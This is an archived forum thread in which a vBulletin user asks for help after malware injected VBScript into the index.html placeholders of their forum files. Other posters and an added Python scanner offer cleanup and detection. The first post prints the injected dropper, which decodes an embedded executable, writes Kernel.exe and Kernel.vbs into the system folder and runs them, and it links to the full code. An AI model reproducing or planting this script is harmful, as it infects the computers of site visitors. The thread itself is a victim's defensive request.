
View Full Version : Omg, Virus code in Vbulletin files.


Mean
07-30-2007, 06:55 PM
Last week, my computer was infected by the kernel.exe virus.
I removed it, but now I am shocked. It put this code in all the index.html pages
in the vBulletin folder on my desktop.

It put this code in

includes/index.html
images/index.html
clientscript/index.html
etc.

<script language=vbscript>
on error resume next
fileexe1="07709014400000300000000000400000000025525500000018 40000000000000000000000640000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000018400000000001403118 60140001800092050331840010762050330841041051150321 12114111103114097109032099097110110111116032098101 03211411711003210511003206807908303210911110010104 60130130100360000000000000000000002120361420281440 69224079144069224079144069224079030090243079135069 22407910810124207914706922407908210509910414406922 4079"
dim sys
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
set fso = df.createobject("Scripting.FileSystemObject","")
set s=df.CreateObject("Shell.Application.1","")
set re=df.createobject("wscript.shell","")
sys=fso.GetSpecialFolder(1)
For a = 1 To Len(filevbs1) Step 3
filevbs2=filevbs2 & chr(mid(filevbs1,a,3))
if a < len(fileexe1)+1 then fileexe2=fileexe2 & chr(mid(fileexe1,a,3))
next
fso.CreateTextFile(sys & "\TSP32E.DLL").write fileexe1
if fso.opentextfile(sys & "\Systeme.dll").readall<>"on" then
fso.CreateTextFile(sys & "\Kernel.exe").write fileexe2
s.Open (sys & "\Kernel.exe")
end if
fso.CreateTextFile(sys & "\TSP32V.DLL").write filevbs1
if fso.opentextfile(sys & "\Systemv.dll").readall<>"on" then
fso.CreateTextFile(sys & "\Kernel.vbs").write filevbs2
s.Open (sys & "\Kernel.vbs")
end if
</script>

I think maybe this problem

Parse error: syntax error, unexpected $end, expecting T_STRING or T_VARIABLE or '{' or '$'

is from that virus code?

I am very shocked by that..

The full code is this. (I couldn't paste the full code because it is about 24.500 characters)
http://rapidshare.com/files/45994675/kernelcode.html

EnIgMa1234
07-30-2007, 07:00 PM
This is not default vb code as the index.html are empty. Someone put that there

Mean
07-30-2007, 07:03 PM
This is not default vb code as the index.html are empty. Someone put that there

Yes, of course. But is there any way to get rid of that?

EnIgMa1234
07-30-2007, 07:05 PM
Find out who put it there. Have you downloaded any 'dodgy files' lately?

Delete those files also

da420
07-30-2007, 07:07 PM
Yes, of course. But is there any way to get rid of that?

Replace it with the original file.

Also, if you didn't put that there I would suggest looking at how secure your server is, because no one should be able to add that. Check file permissions, change passwords, server logs, etc. Having someone install a virus on your computer through your website is very bad, and should definitely be looked into.
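
Added example (not part of the thread and not vBulletin's own code): a Python check to run over the local vBulletin copy before uploading it, flagging index.html placeholders that are no longer empty or that contain markers visible in the script posted above. The function names and the sample tree are constructed for illustration; the assumption that stock placeholders are empty comes from EnIgMa1234's reply.

```python
import re
import tempfile
from pathlib import Path

# Indicators copied from the script quoted in the first post (case-insensitive).
MARKERS = {
    "vbscript block": re.compile(rb"<script[^>]*language\s*=\s*[\"']?vbscript", re.I),
    "classid from post": re.compile(rb"BD96C556-65A3-11D0-983A-00C04FC29E36", re.I),
    "FileSystemObject": re.compile(rb"Scripting\.FileSystemObject", re.I),
    "WScript.Shell": re.compile(rb"wscript\.shell", re.I),
}

def inspect_file(path):
    """Return the reasons a placeholder file looks tampered with (empty list = clean)."""
    data = Path(path).read_bytes()
    reasons = [name for name, rx in MARKERS.items() if rx.search(data)]
    # Assumption taken from the thread: stock index.html placeholders are empty.
    if data.strip() and not reasons:
        reasons.append("non-empty placeholder")
    return reasons

def scan_tree(root, names=("index.html", "index.htm")):
    """Walk root and return {relative_path: reasons} for suspicious placeholders."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.name.lower() in names:
            reasons = inspect_file(path)
            if reasons:
                findings[path.relative_to(root).as_posix()] = reasons
    return findings

def build_sample_tree(root):
    """Constructed sample: one clean, one edited and one injected placeholder."""
    samples = {
        "includes/index.html": b"",
        "images/index.html": b"<html>hello</html>",
        "clientscript/index.html": b"<script language=vbscript>\n"
            b'df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"\n'
            b'set fso = df.createobject("Scripting.FileSystemObject","")\n</script>',
    }
    for rel, body in samples.items():
        target = Path(root, rel)
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(body)

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_tree(tmp)
```

Calling `scan_tree()` on the real folder returns an empty dict when every placeholder is clean; any flagged file should be replaced from the original package rather than edited by hand.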

Mean
07-30-2007, 07:16 PM
Replace it with the original file.

Also, if you didn't put that there I would suggest looking at how secure your server is, because no one should be able to add that. Check file permissions, change passwords, server logs, etc. Having someone install a virus on your computer through your website is very bad, and should definitely be looked into.

I removed that virus by reading this
http://www.spywareremove.com/removekernelexe.html

Maybe after that, it put the code in the vBulletin folder on my desktop.

When I got this

Parse error: syntax error, unexpected $end, expecting T_STRING or T_VARIABLE or '{' or '$'

error, I uploaded the vBulletin files from my desktop to the web, and I saw that. :(